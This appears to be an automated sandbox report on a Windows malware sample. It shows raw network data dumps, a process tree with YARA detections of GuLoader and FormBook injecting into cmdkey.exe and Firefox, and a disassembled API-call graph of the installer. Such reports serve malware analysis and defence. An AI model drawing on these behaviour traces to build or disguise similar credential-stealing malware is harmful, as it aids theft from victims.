                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: b2 6e 4a 24 86 9a 84 79 84 e8 c9 bf d8 7b f8 5f 73 5e 93 c1 e7 62 3f e0 e4 bf 2f e6 a5 57 be d2 fc e3 8e 08 2f eb a4 25 16 e1 5a 29 a5 e6 e8 1d 6d 75 e1 66 28 fa 8a 18 73 5d b6 94 43 fc 93 f2 9d 54 03 40 52 38 fe b4 00 75 7d ec 21 e4 89 b0 55 56 c4 c1 71 22 f9 7f 70 a8 6c ce f5 e7 85 fe e2 a6 94 ea bc 20 5d fb f3 7a 90 5e 83 db 09 e4 b3 10 f4 d7 be 30 1c 05 78 58 7c 19 c1 18 11 ce 91 67 9f c2 52 e0 f8 72 ee 9f 1a b2 69 5c e8 b5 1f 0c 80 83 75 73 5c 2b 9b 24 f7 c1 56 c8 ce 88 61 8c 2e e0 a8 c7 78 37 70 69 40 ba 30 ab 4f f3 27 66 25 2c f1 b4 66 af 1e 61 65 59 4f fd 35 a4 2f 94 f7 2b 37 75 01 b2 c8 23 92 9d 75 f4 e6 cd dc b1 1c d9 2b c9 41 53 d8 bc 17 c9 2a 52 56 19 9d f5 fb 40 42 88 14 16 b6 e4 41 08 ec 28 6b 57 02 88 1c 3b e2 73 0c 0f 97 62 39 96 e1 c7 54
                                                                                                                                                                                                                                                              Data Ascii: nJ$y{_s^b?/W/%Z)muf(s]CT@R8u}!UVq"pl ]z^0xX|gRri\us\+$Va.x7pi@0O'f%,faeYO5/+7u#u+AS*RV@BA(kW;sb9T
                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: 30 ca 50 93 15 74 a3 a0 43 00 fc a7 a2 df c2 2d 64 c0 bc 6e 73 1f f0 56 a1 aa 3b fe 81 d5 6e e6 63 56 9a ad 56 8f a8 4e 6d fc e9 de 96 d3 da 9f 6f 21 7f d8 ec cc 6c 2b b7 bc 6b 04 fa 04 81 87 70 b3 8f c4 fd f6 d1 df 88 2f cd 18 53 8d 3d fa bb d8 27 3d 2b 11 46 24 51 ad 19 ed 62 09 ed 1f fd 0d e2 65 28 7f 3f 7e 88 a4 2a c9 2c 51 bf f1 78 c2 34 38 9e e7 78 05 61 48 19 de 21 40 96 cf 15 8f 98 f0 92 25 57 ba e6 07 3f 77 43 07 b5 c7 64 66 42 e9 da 58 fb 39 3a 98 d3 be ad 85 c8 ff 94 de 41 02 87 ff ba 2e e2 de d2 75 e3 e5 2d 5b 5c 10 44 ac 44 00 40 28 f1 7d ce 7f 6b 30 8e 4d 3a ec e8 e0 6c 03 52 97 83 28 96 ac 11 ee 00 0f e7 04 f3 0e e2 2f 24 5c 6d 6e 43 3b 1e 0b 42 72 31 02 d6 14 7e a8 89 74 cb 89 65 db 3f 29 65 7b 36 6e 1c 55 0d 06 a2 a5 ea 95 89 64 f4 dd d5
                                                                                                                                                                                                                                                              Data Ascii: 0PtC-dnsV;ncVVNmo!l+kp/S='=+F$Qbe(?~*,Qx48xaH!@%W?wCdfBX9:A.u-[\DD@(}k0M:lR(/$\mnC;Br1~te?)e{6nUd
                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: 96 2a d0 6f 6b 57 91 8c cd 47 cb 48 dc d0 0e a0 7c 56 34 94 5e 26 aa 33 30 c0 48 87 ab ef 32 83 60 d7 67 51 91 29 1a 47 0a 90 3c 69 ed 17 2a 9a 1f d8 9a c8 41 1e ba 05 05 5e d3 09 0b c7 a0 55 68 12 b8 de ec f9 36 8e 22 dd f5 0d d3 0a b3 53 ad 18 55 87 78 59 de c4 05 89 be 5d 67 27 eb b5 91 fd 77 ce 93 f5 d3 23 af 1c 50 15 48 5b 01 9b 58 c5 51 f2 51 6d 0b 50 21 f9 5f 0d 75 d6 37 a1 92 84 a9 4b ae c9 b8 4b 00 b4 9d 61 80 13 e9 55 eb c4 59 3e cf c5 40 2c 0e 7f 27 a0 74 5e 19 40 84 ed b9 f4 c3 3f c4 70 c8 89 1d 62 d5 c8 c2 6e 28 69 88 f5 18 8f 31 f2 a3 70 3e 0a cf ee 01 fd 1f 4b 4e 9b 5a 65 84 e2 95 40 44 e2 ee 9c 6f 22 7a 6f 77 25 0b 93 b6 97 d6 20 b4 03 70 9f c4 67 43 80 1e 60 c8 53 ea 71 3c 43 d5 1e 46 c0 93 66 43 e0 9f a3 bd 5a ea d7 bc db 86 64 0a 9f 2d
                                                                                                                                                                                                                                                              Data Ascii: *okWGH|V4^&30H2`gQ)G<i*A^Uh6"SUxY]g'w#PH[XQQmP!_u7KKaUY>@,'t^@?pbn(i1p>KNZe@Do"zow% pgC`Sq<CFfCZd-
                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: ab af 4c 7b d4 ed 24 2c 0f ca b6 34 a6 f2 7b cd 76 01 66 ad b7 84 47 5a 97 ea 9f ef 84 3c f2 ed e0 6d 3f ec 5f 2c 8d fe d9 22 cc f1 1b 67 bc f0 fa a6 9e a8 88 d1 8d 4a 56 17 dc 68 6e 2d cb e6 e7 62 b7 b8 c2 b4 e0 5c a8 1d 41 15 ec 25 a4 f8 91 4d 11 18 a6 5e 14 07 98 65 6d 74 24 60 ce 16 63 46 fb 18 f2 71 dc b4 d9 bb 87 05 e0 f5 6a c3 eb 3f 89 77 f7 68 f0 b7 93 af 38 a6 aa 21 38 e1 a0 89 a1 e0 34 41 13 5d e5 6c 5c 1a bf c0 09 df 77 23 9a 60 a7 71 28 22 96 a8 7e f9 68 7e 0d a1 ab fc 26 38 9a 4e d9 aa 02 99 e5 d3 50 1d 36 13 38 66 ea cd ba 17 c3 21 7d 0d e7 98 cb f4 37 d3 97 c3 b2 b3 b1 30 f0 d5 8f e5 2d 8d cc da 58 6c 39 68 51 a2 40 ce ee d0 8b 04 fc 3e 5c 84 99 51 0a 6a da 80 8a 98 5e b8 18 68 b0 22 13 a1 93 77 83 9c bf 39 1f 6e c3 5f e3 37 b8 38 91 6c 41
                                                                                                                                                                                                                                                              Data Ascii: L{$,4{vfGZ<m?_,"gJVhn-b\A%M^emt$`cFqj?wh8!84A]l\w#`q("~h~&8NP68f!}70-Xl9hQ@>\Qj^h"w9n_78lA
                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: 38 55 02 2d c0 fb c9 21 d0 bf 00 8a 28 68 12 ec d3 5f 2d 0c 21 43 b6 8e 34 71 fe 13 da 29 d1 a2 2f a8 94 7e cf a4 cc bf ab 40 aa ab 78 b2 bb 5e 2a a0 cd db dc 66 72 e3 e3 f9 42 64 f2 06 fa 29 14 0d f9 d4 68 e4 5e 11 9a 55 54 9c cd ab d6 c1 0f 8e f8 7b 63 6c d6 a3 5b 2c cf 28 16 53 3f 77 3d 68 82 4f 8d 47 4c 00 0d 75 b6 7d 57 40 1c 74 05 38 ed 2d 45 0c fe 10 3f 70 03 ca 03 27 b9 ed 32 fd bd 50 19 01 17 7e 3e 11 a3 95 66 10 23 45 1f cc 4d c4 29 38 d9 32 4b 9e e0 e8 b3 da 12 93 28 b1 aa 98 08 11 dd 4a 7f c9 f4 27 85 30 ee 9a a8 9b 23 c8 22 6c 4c 47 46 37 73 83 4f 05 db 5a cb 24 2c a3 a1 73 66 39 f2 2b 3a e4 58 16 e3 1c 72 cf 04 43 b5 6d 74 d3 59 a3 a5 cb 40 a7 1e 91 cc c0 96 b4 0b 36 5b 98 d0 91 a5 de 26 39 28 e8 a0 00 a9 1d b9 dc 30 57 3a 7d c9 a4 68 3a 9a
                                                                                                                                                                                                                                                              Data Ascii: 8U-!(h_-!C4q)/~@x^*frBd)h^UT{cl[,(S?w=hOGLu}W@t8-E?p'2P~>f#EM)82K(J'0#"lLGF7sOZ$,sf9+:XrCmtY@6[&9(0W:}h:


                                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:07:34:13
                                                                                                                                                                                                                                                              Start date:09/10/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\ImBm40hNZ2.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:1'094'223 bytes
                                                                                                                                                                                                                                                              MD5 hash:D4C7AAB6ED29A31A27712F4536614667
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.16987895895.00000000034AB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                              Start time:07:34:50
                                                                                                                                                                                                                                                              Start date:09/10/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\ImBm40hNZ2.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:1'094'223 bytes
                                                                                                                                                                                                                                                              MD5 hash:D4C7AAB6ED29A31A27712F4536614667
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                                              Start time:07:35:19
                                                                                                                                                                                                                                                              Start date:09/10/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe"
                                                                                                                                                                                                                                                              Imagebase:0x320000
                                                                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                              Start time:07:35:21
                                                                                                                                                                                                                                                              Start date:09/10/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmdkey.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\cmdkey.exe"
                                                                                                                                                                                                                                                              Imagebase:0xa90000
                                                                                                                                                                                                                                                              File size:17'408 bytes
                                                                                                                                                                                                                                                              MD5 hash:6CDC8E5DF04752235D5B4432EACC81A8
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                              Start time:07:35:34
                                                                                                                                                                                                                                                              Start date:09/10/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe"
                                                                                                                                                                                                                                                              Imagebase:0x320000
                                                                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                              Start time:07:35:47
                                                                                                                                                                                                                                                              Start date:09/10/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff6fc450000
                                                                                                                                                                                                                                                              File size:597'432 bytes
                                                                                                                                                                                                                                                              MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:17.8%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:15.7%
                                                                                                                                                                                                                                                                Signature Coverage:20.2%
                                                                                                                                                                                                                                                                Total number of Nodes:1469
                                                                                                                                                                                                                                                                Total number of Limit Nodes:35
                                                                                                                                                                                                                                                                execution_graph 3627 4022c0 3628 4022f0 3627->3628 3629 4022c5 3627->3629 3631 4029fd 18 API calls 3628->3631 3640 402b07 3629->3640 3634 4022f7 3631->3634 3632 4022cc 3633 4022d6 3632->3633 3636 40230f 3632->3636 3644 4029fd 3633->3644 3650 402a3d RegOpenKeyExA 3634->3650 3641 4029fd 18 API calls 3640->3641 3642 402b20 3641->3642 3643 402b2e RegOpenKeyExA 3642->3643 3643->3632 3645 402a09 3644->3645 3660 405bb3 3645->3660 3648 4022dd RegDeleteValueA RegCloseKey 3648->3636 3653 402a68 3650->3653 3657 40230d 3650->3657 3651 402a8e RegEnumKeyA 3652 402aa0 RegCloseKey 3651->3652 3651->3653 3699 405ebc GetModuleHandleA 3652->3699 3653->3651 3653->3652 3655 402ac5 RegCloseKey 3653->3655 3658 402a3d 3 API calls 3653->3658 3655->3657 3657->3636 3658->3653 3659 402ae0 RegDeleteKeyA 3659->3657 3675 405bc0 3660->3675 3661 405de3 3662 402a2a 3661->3662 3694 405b91 lstrcpynA 3661->3694 3662->3648 3678 405dfc 3662->3678 3664 405c61 GetVersion 3664->3675 3665 405dba lstrlenA 3665->3675 3666 405bb3 10 API calls 3666->3665 3670 405cd9 GetSystemDirectoryA 3670->3675 3671 405cec GetWindowsDirectoryA 3671->3675 3672 405dfc 5 API calls 3672->3675 3673 405bb3 10 API calls 3673->3675 3674 405d63 lstrcatA 3674->3675 3675->3661 3675->3664 3675->3665 3675->3666 3675->3670 3675->3671 3675->3672 3675->3673 3675->3674 3676 405d20 SHGetSpecialFolderLocation 3675->3676 3687 405a78 RegOpenKeyExA 3675->3687 3692 405aef wsprintfA 3675->3692 3693 405b91 lstrcpynA 3675->3693 3676->3675 3677 405d38 SHGetPathFromIDListA CoTaskMemFree 3676->3677 3677->3675 3679 405e08 3678->3679 3681 405e65 CharNextA 3679->3681 3682 405e70 3679->3682 3685 405e53 CharNextA 3679->3685 3686 405e60 CharNextA 3679->3686 3695 40564c 3679->3695 3680 405e74 CharPrevA 3680->3682 3681->3679 3681->3682 3682->3680 3683 405e8f 3682->3683 3683->3648 3685->3679 3686->3681 3688 405ae9 3687->3688 3689 405aab RegQueryValueExA 3687->3689 3688->3675 3690 405acc RegCloseKey 3689->3690 3690->3688 3692->3675 3693->3675 3694->3662 3696 405652 3695->3696 3697 405665 3696->3697 3698 405658 CharNextA 3696->3698 3697->3679 3698->3696 3700 405ee3 GetProcAddress 3699->3700 3701 405ed8 LoadLibraryA 3699->3701 3702 402ab0 3700->3702 3701->3700 3701->3702 3702->3657 3702->3659 4543 10001000 4546 1000101b 4543->4546 4553 100014d8 4546->4553 4548 10001020 4549 10001024 4548->4549 4550 10001027 GlobalAlloc 4548->4550 4551 100014ff 3 API calls 4549->4551 4550->4549 4552 10001019 4551->4552 4554 1000123b 3 API calls 4553->4554 4556 100014de 4554->4556 4555 100014e4 4555->4548 4556->4555 4557 100014f0 GlobalFree 4556->4557 4557->4548 4558 4019c0 4559 4029fd 18 API calls 4558->4559 4560 4019c7 4559->4560 4561 4029fd 18 API calls 4560->4561 4562 4019d0 4561->4562 4563 4019d7 lstrcmpiA 4562->4563 4564 4019e9 lstrcmpA 4562->4564 4565 4019dd 4563->4565 4564->4565 4566 402b42 4567 402b51 SetTimer 4566->4567 4568 402b6a 4566->4568 4567->4568 4569 402bbf 4568->4569 4570 402b84 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4568->4570 4570->4569 4107 402645 4108 4029fd 18 API calls 4107->4108 4109 40264c FindFirstFileA 4108->4109 4110 40266f 4109->4110 4111 40265f 4109->4111 4115 405aef wsprintfA 4110->4115 4113 402676 4116 405b91 lstrcpynA 4113->4116 4115->4113 4116->4111 4135 4023c8 4136 402b07 19 API calls 4135->4136 4137 4023d2 4136->4137 4138 4029fd 18 API calls 4137->4138 4139 4023db 4138->4139 4140 402663 4139->4140 4141 4023e5 RegQueryValueExA 4139->4141 4142 402405 4141->4142 4145 40240b RegCloseKey 4141->4145 4142->4145 4146 405aef wsprintfA 4142->4146 4145->4140 4146->4145 4571 403fc8 4572 403fde 4571->4572 4580 4040ea 4571->4580 4600 403e7f 4572->4600 4573 404159 4574 404163 GetDlgItem 4573->4574 4575 40422d 4573->4575 4578 404179 4574->4578 4579 4041eb 4574->4579 4609 403ee6 4575->4609 4577 404034 4582 403e7f 19 API calls 4577->4582 4578->4579 4585 40419f 6 API calls 4578->4585 4579->4575 4586 4041fd 4579->4586 4580->4573 4580->4575 4583 40412e GetDlgItem SendMessageA 4580->4583 4584 404041 CheckDlgButton 4582->4584 4605 403ea1 EnableWindow 4583->4605 4603 403ea1 EnableWindow 4584->4603 4585->4579 4589 404203 SendMessageA 4586->4589 4590 404214 4586->4590 4589->4590 4594 404228 4590->4594 4595 40421a SendMessageA 4590->4595 4591 404154 4606 404252 4591->4606 4593 40405f GetDlgItem 4604 403eb4 SendMessageA 4593->4604 4595->4594 4597 404075 SendMessageA 4598 404093 GetSysColor 4597->4598 4599 40409c SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4597->4599 4598->4599 4599->4594 4601 405bb3 18 API calls 4600->4601 4602 403e8a SetDlgItemTextA 4601->4602 4602->4577 4603->4593 4604->4597 4605->4591 4607 404260 4606->4607 4608 404265 SendMessageA 4606->4608 4607->4608 4608->4573 4610 403efe GetWindowLongA 4609->4610 4620 403f87 4609->4620 4611 403f0f 4610->4611 4610->4620 4612 403f21 4611->4612 4613 403f1e GetSysColor 4611->4613 4614 403f31 SetBkMode 4612->4614 4615 403f27 SetTextColor 4612->4615 4613->4612 4616 403f49 GetSysColor 4614->4616 4617 403f4f 4614->4617 4615->4614 4616->4617 4618 403f60 4617->4618 4619 403f56 SetBkColor 4617->4619 4618->4620 4621 403f73 DeleteObject 4618->4621 4622 403f7a CreateBrushIndirect 4618->4622 4619->4618 4620->4594 4621->4622 4622->4620 4626 401ccc GetDlgItem GetClientRect 4627 4029fd 18 API calls 4626->4627 4628 401cfc LoadImageA SendMessageA 4627->4628 4629 401d1a DeleteObject 4628->4629 4630 402892 4628->4630 4629->4630 4631 4024d1 4632 4024d6 4631->4632 4633 4024e7 4631->4633 4634 4029e0 18 API calls 4632->4634 4635 4029fd 18 API calls 4633->4635 4638 4024dd 4634->4638 4636 4024ee lstrlenA 4635->4636 4636->4638 4637 402663 4638->4637 4639 40250d WriteFile 4638->4639 4639->4637 4381 4025d3 4382 40283f 4381->4382 4383 4025da 4381->4383 4384 4029e0 18 API calls 4383->4384 4385 4025e5 4384->4385 4386 4025ec SetFilePointer 4385->4386 4386->4382 4387 4025fc 4386->4387 4389 405aef wsprintfA 4387->4389 4389->4382 4413 4014d6 4414 4029e0 18 API calls 4413->4414 4415 4014dc Sleep 4414->4415 4417 402892 4415->4417 4640 401dd8 4641 4029fd 18 API calls 4640->4641 4642 401dde 4641->4642 4643 4029fd 18 API calls 4642->4643 4644 401de7 4643->4644 4645 4029fd 18 API calls 4644->4645 4646 401df0 4645->4646 4647 4029fd 18 API calls 4646->4647 4648 401df9 4647->4648 4649 401423 25 API calls 4648->4649 4650 401e00 ShellExecuteA 4649->4650 4651 401e2d 4650->4651 4652 4035d8 4653 4035e3 4652->4653 4654 4035e7 4653->4654 4655 4035ea GlobalAlloc 4653->4655 4655->4654 4656 40155b 4657 401577 ShowWindow 4656->4657 4658 40157e 4656->4658 4657->4658 4659 402892 4658->4659 4660 40158c ShowWindow 4658->4660 4660->4659 4661 401edc 4662 4029fd 18 API calls 4661->4662 4663 401ee3 GetFileVersionInfoSizeA 4662->4663 4664 401f06 GlobalAlloc 4663->4664 4671 401f5c 4663->4671 4665 401f1a GetFileVersionInfoA 4664->4665 4664->4671 4666 401f2b VerQueryValueA 4665->4666 4665->4671 4667 401f44 4666->4667 4666->4671 4672 405aef wsprintfA 4667->4672 4669 401f50 4673 405aef wsprintfA 4669->4673 4672->4669 4673->4671 3703 4030e2 #17 SetErrorMode OleInitialize 3704 405ebc 3 API calls 3703->3704 3705 403127 SHGetFileInfoA 3704->3705 3776 405b91 lstrcpynA 3705->3776 3707 403152 GetCommandLineA 3777 405b91 lstrcpynA 3707->3777 3709 403164 GetModuleHandleA 3710 40317b 3709->3710 3711 40564c CharNextA 3710->3711 3712 40318f CharNextA 3711->3712 3720 40319f 3712->3720 3713 403269 3714 40327c GetTempPathA 3713->3714 3778 4030ae 3714->3778 3716 403294 3717 403298 GetWindowsDirectoryA lstrcatA 3716->3717 3718 4032ee DeleteFileA 3716->3718 3721 4030ae 11 API calls 3717->3721 3786 402c29 GetTickCount GetModuleFileNameA 3718->3786 3719 40564c CharNextA 3719->3720 3720->3713 3720->3719 3724 40326b 3720->3724 3723 4032b4 3721->3723 3723->3718 3727 4032b8 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3723->3727 3869 405b91 lstrcpynA 3724->3869 3725 403302 3728 403388 3725->3728 3732 40564c CharNextA 3725->3732 3772 403398 3725->3772 3730 4030ae 11 API calls 3727->3730 3814 40361a 3728->3814 3734 4032e6 3730->3734 3735 40331d 3732->3735 3734->3718 3734->3772 3742 403363 3735->3742 3743 4033c7 lstrcatA lstrcmpiA 3735->3743 3736 4033b1 3893 4053a5 3736->3893 3737 4034a5 3738 403528 ExitProcess 3737->3738 3740 405ebc 3 API calls 3737->3740 3745 4034b4 3740->3745 3870 40570f 3742->3870 3747 4033e3 CreateDirectoryA SetCurrentDirectoryA 3743->3747 3743->3772 3748 405ebc 3 API calls 3745->3748 3750 403405 3747->3750 3751 4033fa 3747->3751 3752 4034bd 3748->3752 3898 405b91 lstrcpynA 3750->3898 3897 405b91 lstrcpynA 3751->3897 3755 405ebc 3 API calls 3752->3755 3758 4034c6 3755->3758 3757 403413 3760 405bb3 18 API calls 3757->3760 3768 403499 3757->3768 3773 405bb3 18 API calls 3757->3773 3775 403485 CloseHandle 3757->3775 3899 405a45 3757->3899 3904 405344 CreateProcessA 3757->3904 3761 403514 ExitWindowsEx 3758->3761 3767 4034d4 GetCurrentProcess 3758->3767 3759 40337d 3885 405b91 lstrcpynA 3759->3885 3763 403444 DeleteFileA 3760->3763 3761->3738 3764 403521 3761->3764 3763->3757 3765 403451 CopyFileA 3763->3765 3907 40140b 3764->3907 3765->3757 3770 4034e4 3767->3770 3771 405a45 40 API calls 3768->3771 3770->3761 3771->3772 3886 403540 3772->3886 3773->3757 3775->3757 3776->3707 3777->3709 3779 405dfc 5 API calls 3778->3779 3781 4030ba 3779->3781 3780 4030c4 3780->3716 3781->3780 3910 405621 lstrlenA CharPrevA 3781->3910 3917 405822 GetFileAttributesA CreateFileA 3786->3917 3788 402c69 3813 402c79 3788->3813 3918 405b91 lstrcpynA 3788->3918 3790 402c8f 3919 405668 lstrlenA 3790->3919 3794 402ca0 GetFileSize 3795 402d9c 3794->3795 3807 402cb7 3794->3807 3924 402bc5 3795->3924 3797 402da5 3799 402dd5 GlobalAlloc 3797->3799 3797->3813 3960 403097 SetFilePointer 3797->3960 3935 403097 SetFilePointer 3799->3935 3801 402e08 3803 402bc5 6 API calls 3801->3803 3803->3813 3804 402dbe 3806 403081 ReadFile 3804->3806 3805 402df0 3936 402e62 3805->3936 3809 402dc9 3806->3809 3807->3795 3807->3801 3810 402bc5 6 API calls 3807->3810 3807->3813 3957 403081 3807->3957 3809->3799 3809->3813 3810->3807 3811 402dfc 3811->3811 3812 402e39 SetFilePointer 3811->3812 3811->3813 3812->3813 3813->3725 3815 405ebc 3 API calls 3814->3815 3816 40362e 3815->3816 3817 403634 3816->3817 3818 403646 3816->3818 3988 405aef wsprintfA 3817->3988 3819 405a78 3 API calls 3818->3819 3820 403671 3819->3820 3822 40368f lstrcatA 3820->3822 3823 405a78 3 API calls 3820->3823 3824 403644 3822->3824 3823->3822 3979 4038df 3824->3979 3827 40570f 18 API calls 3828 4036c1 3827->3828 3829 40374a 3828->3829 3831 405a78 3 API calls 3828->3831 3830 40570f 18 API calls 3829->3830 3832 403750 3830->3832 3840 4036ed 3831->3840 3833 403760 LoadImageA 3832->3833 3834 405bb3 18 API calls 3832->3834 3835 403806 3833->3835 3836 403787 RegisterClassA 3833->3836 3834->3833 3838 40140b 2 API calls 3835->3838 3837 4037bd SystemParametersInfoA CreateWindowExA 3836->3837 3844 403810 3836->3844 3837->3835 3843 40380c 3838->3843 